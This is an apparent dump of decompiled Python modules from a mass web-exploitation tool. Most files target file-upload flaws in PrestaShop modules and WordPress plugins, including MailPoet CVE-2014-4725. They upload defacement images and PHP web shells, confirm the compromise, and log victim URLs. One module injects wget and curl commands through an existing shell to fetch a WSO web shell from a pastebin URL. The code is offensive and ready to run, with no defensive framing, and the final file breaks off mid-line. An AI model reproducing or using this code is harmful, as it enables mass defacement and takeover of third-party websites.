| c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = site + '/modules/productpageadverts/uploadimage.php' 22 | FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')} 23 | FileDataShell = {'userfile': open(ShellPresta, 'rb')} 24 | GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers) 25 | if 'success' in GoT.content: 26 | IndexPath = '/modules/productpageadverts/slides/' + Jce_Deface_image.split('/')[1] 27 | CheckIndex = requests.get('http://' + site + IndexPath, timeout=10, headers=Headers) 28 | if 'GIF89a' in CheckIndex.content: 29 | with open('result/Index_results.txt', 'a') as writer: 30 | writer.write(IndexPath + '\n') 31 | requests.post('http://' + Exp, files=FileDataShell, timeout=10, headers=Headers) 32 | ShellPath = '/modules/productpageadverts/slides/' + ShellPresta.split('/')[1] 33 | CheckShell = requests.get('http://' + site + ShellPath, timeout=10, headers=Headers) 34 | if 'Vuln!!' in CheckShell.content: 35 | with open('result/Shell_results.txt', 'a') as writer: 36 | writer.write(ShellPath + '\n') 37 | return printModule.returnYes(site, 'N/A', 'productpageadverts Module', 'Prestashop') 38 | else: 39 | return printModule.returnNo(site, 'N/A', 'productpageadverts Module', 'Prestashop') 40 | 41 | else: 42 | return printModule.returnNo(site, 'N/A', 'productpageadverts Module', 'Prestashop') 43 | except: 44 | return printModule.returnNo(site, 'N/A', 'productpageadverts Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_lib.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_lib.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | Exl = site + '/modules/lib/redactor/file_upload.php' 21 | try: 22 | Checkvuln = requests.get('http://' + Exl, timeout=10, headers=Headers) 23 | if Checkvuln.status_code == 200: 24 | FileDataIndex = {'file': open(Jce_Deface_image, 'rb')} 25 | FileDataShell = {'file': open(ShellPresta, 'rb')} 26 | uploadedPathIndex = site + '/masseditproduct/uploads/file/' + Jce_Deface_image.split('/')[1] 27 | uploadedPathShell = site + '/masseditproduct/uploads/file/' + ShellPresta.split('/')[1] 28 | requests.post('http://' + Exl, files=FileDataIndex, timeout=10, headers=Headers) 29 | CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=10, headers=Headers) 30 | if 'GIF89a' in CheckIndex.content: 31 | with open('result/Index_results.txt', 'a') as writer: 32 | writer.write(uploadedPathIndex + '\n') 33 | requests.post('http://' + Exl, files=FileDataShell, timeout=10, headers=Headers) 34 | Checkshell = requests.get('http://' + uploadedPathShell, timeout=10, headers=Headers) 35 | if 'Vuln!!' in Checkshell.content: 36 | with open('result/Shell_results.txt', 'a') as writer: 37 | writer.write(uploadedPathShell + '\n') 38 | return printModule.returnYes(site, 'N/A', 'lib Module', 'Prestashop') 39 | else: 40 | return printModule.returnNo(site, 'N/A', 'lib Module', 'Prestashop') 41 | 42 | else: 43 | return printModule.returnNo(site, 'N/A', 'lib Module', 'Prestashop') 44 | except: 45 | return printModule.returnNo(site, 'N/A', 'lib Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_jro_homepageadvertise.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_jro_homepageadvertise.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | try: 21 | Exp = site + '/modules/jro_homepageadvertise/uploadimage.php' 22 | FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')} 23 | FileDataShell = {'userfile': open(ShellPresta, 'rb')} 24 | GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers) 25 | if 'success' in GoT.content: 26 | IndexPath = '/modules/jro_homepageadvertise/slides/' + Jce_Deface_image.split('/')[1] 27 | CheckIndex = requests.get('http://' + site + IndexPath, timeout=10, headers=Headers) 28 | if 'GIF89a' in CheckIndex.content: 29 | with open('result/Index_results.txt', 'a') as writer: 30 | writer.write(IndexPath + '\n') 31 | requests.post('http://' + Exp, files=FileDataShell, timeout=10, headers=Headers) 32 | ShellPath = '/modules/jro_homepageadvertise/slides/' + ShellPresta.split('/')[1] 33 | CheckShell = requests.get('http://' + site + ShellPath, timeout=10, headers=Headers) 34 | if 'Vuln!!' in CheckShell.content: 35 | with open('result/Shell_results.txt', 'a') as writer: 36 | writer.write(ShellPath + '\n') 37 | return printModule.returnYes(site, 'N/A', 'jro_homepageadvertise Module', 'Prestashop') 38 | else: 39 | return printModule.returnNo(site, 'N/A', 'jro_homepageadvertise Module', 'Prestashop') 40 | 41 | else: 42 | return printModule.returnNo(site, 'N/A', 'jro_homepageadvertise Module', 'Prestashop') 43 | except: 44 | return printModule.returnNo(site, 'N/A', 'jro_homepageadvertise Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/WooCommerce_ProductAddonsExp.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\WooCommerce_ProductAddonsExp.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | 17 | def Exploit(site): 18 | try: 19 | Exp = 'http://' + site + '/wp-admin/admin-ajax.php' 20 | Postdata = {'action': 'nm_personalizedproduct_upload_file','name': 'upload.php'} 21 | FileData = {'file': ('settings_auto.php', open('files/settings_auto.php', 'rb'), 22 | 'multipart/form-data') 23 | } 24 | GoT = requests.post(Exp, files=FileData, data=Postdata, timeout=10, headers=Headers) 25 | if GoT.status_code == 200 or 'success' in GoT.content: 26 | UploadPostPath = 'http://' + site + '/wp-content/uploads/product_files/upload.php' 27 | CheckShell = requests.get(UploadPostPath, timeout=10, headers=Headers) 28 | if 'Vuln!!' in CheckShell.content: 29 | shellChecker = requests.get('http://' + site + '/wp-content/vuln.php', timeout=10, headers=Headers) 30 | if 'Vuln!!' in shellChecker.content: 31 | with open('result/Shell_results.txt', 'a') as writer: 32 | writer.write(site + '/wp-content/vuln.php' + '\n') 33 | IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=10, headers=Headers) 34 | if 'Vuln!!' in IndexCheck.content: 35 | with open('result/Index_results.txt', 'a') as writer: 36 | writer.write(site + '/vuln.htm' + '\n') 37 | return printModule.returnYes(site, 'N/A', 'WooCommerce Product Addons', 'Wordpress') 38 | else: 39 | return printModule.returnNo(site, 'N/A', 'WooCommerce Product Addons', 'Wordpress') 40 | 41 | else: 42 | return printModule.returnNo(site, 'N/A', 'WooCommerce Product Addons', 'Wordpress') 43 | except: 44 | return printModule.returnNo(site, 'N/A', 'WooCommerce Product Addons', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_pk_flexmenu.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_pk_flexmenu.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | Exl = site + '/modules/pk_flexmenu/ajax/upload.php' 21 | try: 22 | Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers) 23 | if Checkvuln.status_code == 200: 24 | FileDataIndex = {'images[]': open(Jce_Deface_image, 'rb')} 25 | FileDataShell = {'images[]': open(ShellPresta, 'rb')} 26 | uploadedPathIndex = site + '/modules/pk_flexmenu/uploads/' + Jce_Deface_image.split('/')[1] 27 | uploadedPathShell = site + '/modules/pk_flexmenu/uploads/' + ShellPresta.split('/')[1] 28 | requests.post('http://' + Exl, files=FileDataIndex, timeout=5, headers=Headers) 29 | CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers) 30 | if 'GIF89a' in CheckIndex.content: 31 | with open('result/Index_results.txt', 'a') as writer: 32 | writer.write(uploadedPathIndex + '\n') 33 | requests.post('http://' + Exl, files=FileDataShell, timeout=5, headers=Headers) 34 | Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers) 35 | if 'Vuln!!' in Checkshell.content: 36 | with open('result/Shell_results.txt', 'a') as writer: 37 | writer.write(uploadedPathShell + '\n') 38 | return printModule.returnYes(site, 'N/A', 'pk_flexmenu Module', 'Prestashop') 39 | else: 40 | return printModule.returnNo(site, 'N/A', 'pk_flexmenu Module', 'Prestashop') 41 | 42 | else: 43 | return printModule.returnNo(site, 'N/A', 'pk_flexmenu Module', 'Prestashop') 44 | except: 45 | return printModule.returnNo(site, 'N/A', 'pk_flexmenu Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_fieldvmegamenu.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_fieldvmegamenu.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | Exl = site + '/modules/fieldvmegamenu/ajax/upload.php' 21 | try: 22 | Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers) 23 | if Checkvuln.status_code == 200: 24 | FileDataIndex = {'images[]': open(Jce_Deface_image, 'rb')} 25 | FileDataShell = {'images[]': open(ShellPresta, 'rb')} 26 | uploadedPathIndex = site + '/modules/fieldvmegamenu/uploads/' + Jce_Deface_image.split('/')[1] 27 | uploadedPathShell = site + '/modules/fieldvmegamenu/uploads/' + ShellPresta.split('/')[1] 28 | requests.post('http://' + Exl, files=FileDataIndex, timeout=5, headers=Headers) 29 | CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers) 30 | if 'GIF89a' in str(CheckIndex.content): 31 | with open('result/Index_results.txt', 'a') as writer: 32 | writer.write(uploadedPathIndex + '\n') 33 | requests.post('http://' + Exl, files=FileDataShell, timeout=5, headers=Headers) 34 | Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers) 35 | if 'Vuln!!' in str(Checkshell.content): 36 | with open('result/Shell_results.txt', 'a') as writer: 37 | writer.write(uploadedPathShell + '\n') 38 | return printModule.returnYes(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop') 39 | else: 40 | return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop') 41 | 42 | else: 43 | return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop') 44 | except: 45 | return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_nvn_export_orders.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_nvn_export_orders.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | Exl = site + '/modules/nvn_export_orders/upload.php' 21 | try: 22 | Checkvuln = requests.get('http://' + Exl, timeout=10, headers=Headers) 23 | if Checkvuln.status_code == 200: 24 | FileDataIndex = {'images[]': open(Jce_Deface_image, 'rb')} 25 | FileDataShell = {'images[]': open(ShellPresta, 'rb')} 26 | uploadedPathIndex = site + '/modules/nvn_export_orders/' + Jce_Deface_image.split('/')[1] 27 | uploadedPathShell = site + '/modules/nvn_export_orders/' + ShellPresta.split('/')[1] 28 | requests.post('http://' + Exl, files=FileDataIndex, timeout=10, headers=Headers) 29 | CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=10, headers=Headers) 30 | if 'GIF89a' in CheckIndex.content: 31 | with open('result/Index_results.txt', 'a') as writer: 32 | writer.write(uploadedPathIndex + '\n') 33 | requests.post('http://' + Exl, files=FileDataShell, timeout=10, headers=Headers) 34 | Checkshell = requests.get('http://' + uploadedPathShell, timeout=10, headers=Headers) 35 | if 'Vuln!!' in Checkshell.content: 36 | with open('result/Shell_results.txt', 'a') as writer: 37 | writer.write(uploadedPathShell + '\n') 38 | return printModule.returnYes(site, 'N/A', 'nvn_export_orders Module', 'Prestashop') 39 | else: 40 | return printModule.returnNo(site, 'N/A', 'nvn_export_orders Module', 'Prestashop') 41 | 42 | else: 43 | return printModule.returnNo(site, 'N/A', 'nvn_export_orders Module', 'Prestashop') 44 | except: 45 | return printModule.returnNo(site, 'N/A', 'nvn_export_orders Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/WP_User_Frontend.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\WP_User_Frontend.py 6 | import requests 7 | import time 8 | from Exploits import printModule 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 17 | year = time.strftime('%y') 18 | month = time.strftime('%m') 19 | 20 | def Exploit(site): 21 | try: 22 | CheckVuln = requests.get('http://' + site + '/wp-admin/admin-ajax.php?action=wpuf_file_upload', timeout=5, headers=Headers) 23 | if 'error' in CheckVuln.content or CheckVuln.status_code == 200: 24 | post = {} 25 | UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 26 | post['action'] = 'wpuf_file_upload' 27 | files = {'wpuf_file': open('files/pwn.gif', 'rb')} 28 | try: 29 | _url = 'http://' + site + '/wp-admin/admin-ajax.php' 30 | _open = requests.post(_url, files=files, data=post, headers=UserAgent, timeout=10) 31 | if 'image][]' in _open.content: 32 | _Def = site + '/wp-content/uploads/20' + year + '/' + month + '/' + 'files/pwn.gif'.split('/')[1] 33 | Check_Deface = requests.get('http://' + _Def, timeout=5, headers=Headers) 34 | if 'GIF89a' in Check_Deface.content: 35 | with open('result/Index_results.txt', 'a') as writer: 36 | writer.write(_Def + '\n') 37 | return printModule.returnYes(site, 'N/A', 'WP User Frontend', 'Wordpress') 38 | else: 39 | return printModule.returnNo(site, 'N/A', 'WP User Frontend', 'Wordpress') 40 | 41 | else: 42 | return printModule.returnNo(site, 'N/A', 'WP User Frontend', 'Wordpress') 43 | except: 44 | return printModule.returnNo(site, 'N/A', 'WP User Frontend', 'Wordpress') 45 | 46 | else: 47 | return printModule.returnNo(site, 'N/A', 'WP User Frontend', 'Wordpress') 48 | except: 49 | return printModule.returnNo(site, 'N/A', 'WP User Frontend', 'Wordpress') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_tdpsthemeoptionpanel.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_tdpsthemeoptionpanel.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | Exl = site + '/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php' 21 | try: 22 | Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers) 23 | if Checkvuln.status_code == 200: 24 | FileDataIndex = {'image_upload': open(Jce_Deface_image, 'rb')} 25 | FileDataShell = {'image_upload': open(ShellPresta, 'rb')} 26 | uploadedPathIndex = site + '/modules/tdpsthemeoptionpanel/upload/' + Jce_Deface_image.split('/')[1] 27 | uploadedPathShell = site + '/modules/tdpsthemeoptionpanel/upload/' + ShellPresta.split('/')[1] 28 | requests.post('http://' + Exl, files=FileDataIndex, timeout=5, headers=Headers) 29 | CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers) 30 | if 'GIF89a' in CheckIndex.content: 31 | with open('result/Index_results.txt', 'a') as writer: 32 | writer.write(uploadedPathIndex + '\n') 33 | requests.post('http://' + Exl, files=FileDataShell, timeout=5, headers=Headers) 34 | Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers) 35 | if 'Vuln!!' in Checkshell.content: 36 | with open('result/Shell_results.txt', 'a') as writer: 37 | writer.write(uploadedPathShell + '\n') 38 | return printModule.returnYes(site, 'N/A', 'tdpsthemeoptionpanel Module', 'Prestashop') 39 | else: 40 | return printModule.returnNo(site, 'N/A', 'tdpsthemeoptionpanel Module', 'Prestashop') 41 | 42 | else: 43 | return printModule.returnNo(site, 'N/A', 'tdpsthemeoptionpanel Module', 'Prestashop') 44 | except: 45 | return printModule.returnNo(site, 'N/A', 'tdpsthemeoptionpanel Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_psmodthemeoptionpanel.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_psmodthemeoptionpanel.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | Exl = site + '/modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php' 21 | try: 22 | Checkvuln = requests.get('http://' + Exl, timeout=10, headers=Headers) 23 | if Checkvuln.status_code == 200: 24 | FileDataIndex = {'image_upload': open(Jce_Deface_image, 'rb')} 25 | FileDataShell = {'image_upload': open(ShellPresta, 'rb')} 26 | uploadedPathIndex = site + '/modules/psmodthemeoptionpanel/upload/' + Jce_Deface_image.split('/')[1] 27 | uploadedPathShell = site + '/modules/psmodthemeoptionpanel/upload/' + ShellPresta.split('/')[1] 28 | requests.post('http://' + Exl, files=FileDataIndex, timeout=10, headers=Headers) 29 | CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=10, headers=Headers) 30 | if 'GIF89a' in CheckIndex.content: 31 | with open('result/Index_results.txt', 'a') as writer: 32 | writer.write(uploadedPathIndex + '\n') 33 | requests.post('http://' + Exl, files=FileDataShell, timeout=10, headers=Headers) 34 | Checkshell = requests.get('http://' + uploadedPathShell, timeout=10, headers=Headers) 35 | if 'Vuln!!' in Checkshell.content: 36 | with open('result/Shell_results.txt', 'a') as writer: 37 | writer.write(uploadedPathShell + '\n') 38 | return printModule.returnYes(site, 'N/A', 'psmodthemeoptionpanel Module', 'Prestashop') 39 | else: 40 | return printModule.returnNo(site, 'N/A', 'psmodthemeoptionpanel Module', 'Prestashop') 41 | 42 | else: 43 | return printModule.returnNo(site, 'N/A', 'psmodthemeoptionpanel Module', 'Prestashop') 44 | except: 45 | return printModule.returnNo(site, 'N/A', 'psmodthemeoptionpanel Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Tools/wsoShellUploaderModule.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Tools\wsoShellUploaderModule.py 6 | import requests 7 | WSoShell = open('files/wso.php', 'r').read() 8 | SHELL_URL = 'https://pastebin.com/raw/dSpsHaiE' 9 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 10 | } 11 | 12 | def UploadWso(EvalShell): 13 | try: 14 | evsh = EvalShell 15 | EvalShell = EvalShell.split('=')[0] + '=' 16 | if 'system' in evsh: 17 | return 'No' 18 | if EvalShell.startswith('http://'): 19 | EvalShell = EvalShell.replace('http://', '') 20 | else: 21 | if EvalShell.startswith('https://'): 22 | EvalShell = EvalShell.replace('https://', '') 23 | Method1 = 'wget {} -O wso.php'.format(SHELL_URL) 24 | Method2 = 'curl -O {};mv dSpsHaiE wso2.php'.format(SHELL_URL) 25 | requests.get('http://{}{};{}'.format(EvalShell, Method1, Method2), timeout=10, headers=Headers) 26 | shellpath = EvalShell.replace(EvalShell.split('/')[len(EvalShell.split('/')) - 1], '') 27 | C1 = requests.get('http://{}wso.php'.format(shellpath), timeout=10, headers=Headers) 28 | C2 = requests.get('http://{}wso2.php'.format(shellpath), timeout=10, headers=Headers) 29 | if 'WebShellOrb' in str(C1.content): 30 | return shellpath + 'wso.php' 31 | if 'WebShellOrb' in str(C2.content): 32 | return shellpath + 'wso2.php' 33 | return 'No' 34 | except: 35 | return 'No' 36 | 37 | 38 | def UploadWso2(Uploader): 39 | Uploader = str(Uploader) 40 | if Uploader.startswith('http://'): 41 | Uploader = Uploader.replace('http://', '') 42 | elif Uploader.startswith('https://'): 43 | Uploader = Uploader.replace('https://', '') 44 | Shell = Uploader.replace(Uploader.split('/')[len(Uploader.split('/')) - 1], 'wso.php') 45 | PostFile = {'file': ['wso.php', WSoShell]} 46 | data = {'_upl': 'Upload'} 47 | try: 48 | X = requests.post('http://' + Uploader, timeout=10, data=data, headers=Headers, files=PostFile) 49 | if 'Shell Uploaded ! :)' in str(X.content): 50 | with open('result/WSo_Shell.txt', 'a') as writer: 51 | writer.write('{}\n'.format(Shell)) 52 | except: 53 | pass -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_wdoptionpanel.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\Presta_wdoptionpanel.py 6 | import requests 7 | from Exploits import printModule 8 | r = '\x1b[31m' 9 | g = '\x1b[32m' 10 | y = '\x1b[33m' 11 | b = '\x1b[34m' 12 | m = '\x1b[35m' 13 | c = '\x1b[36m' 14 | w = '\x1b[37m' 15 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 16 | Jce_Deface_image = 'files/pwn.gif' 17 | ShellPresta = 'files/up.php' 18 | 19 | def Exploit(site): 20 | Exl = site + '/modules/wdoptionpanel/wdoptionpanel_ajax.php' 21 | try: 22 | Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers) 23 | if Checkvuln.status_code == 200: 24 | PostData = {'data': 'bajatax','type': 'image_upload'} 25 | FileDataIndex = {'bajatax': open(Jce_Deface_image, 'rb')} 26 | FileDataShell = {'bajatax': open(ShellPresta, 'rb')} 27 | uploadedPathIndex = site + '/modules/wdoptionpanel/upload/' + Jce_Deface_image.split('/')[1] 28 | uploadedPathShell = site + '/modules/wdoptionpanel/upload/' + ShellPresta.split('/')[1] 29 | requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5, headers=Headers) 30 | CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers) 31 | if 'GIF89a' in CheckIndex.content: 32 | with open('result/Index_results.txt', 'a') as writer: 33 | writer.write(uploadedPathIndex + '\n') 34 | requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5, headers=Headers) 35 | Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers) 36 | if 'Vuln!!' in Checkshell.content: 37 | with open('result/Shell_results.txt', 'a') as writer: 38 | writer.write(uploadedPathShell + '\n') 39 | return printModule.returnYes(site, 'N/A', 'wdoptionpanel Module', 'Prestashop') 40 | else: 41 | return printModule.returnNo(site, 'N/A', 'wdoptionpanel Module', 'Prestashop') 42 | 43 | else: 44 | return printModule.returnNo(site, 'N/A', 'wdoptionpanel Module', 'Prestashop') 45 | except: 46 | return printModule.returnNo(site, 'N/A', 'wdoptionpanel Module', 'Prestashop') -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2014_4725wysija.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\CVE_2014_4725wysija.py 6 | import requests 7 | from Exploits import printModule 8 | from Tools import wsoShellUploaderModule 9 | MailPoetZipShell = 'files/rock.zip' 10 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 11 | } 12 | 13 | def Exploit(site): 14 | try: 15 | FileShell = {'my-theme': open(MailPoetZipShell, 'rb')} 16 | PostData = {'action': 'themeupload','submitter': 'Upload','overwriteexistingtheme': 'on','page': 'GZNeFLoZAb' 17 | } 18 | UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} 19 | url = 'http://' + site + '/wp-admin/admin-post.php?page=wysija_campaigns&action=themes' 20 | GoT = requests.post(url, files=FileShell, data=PostData, headers=UserAgent, timeout=10) 21 | if 'page=wysija_campaigns&action=themes&reload=1' in str(GoT.content): 22 | sh = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/vuln.php' 23 | index = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' 24 | CheckShell = requests.get(sh, timeout=10, headers=Headers) 25 | CheckIndex = requests.get(index, timeout=10, headers=Headers) 26 | if 'Vuln!!' in str(CheckShell.content): 27 | with open('result/Shell_results.txt', 'a') as writer: 28 | writer.write(site + '/wp-content/uploads/wysija/themes/rock/vuln.php' + 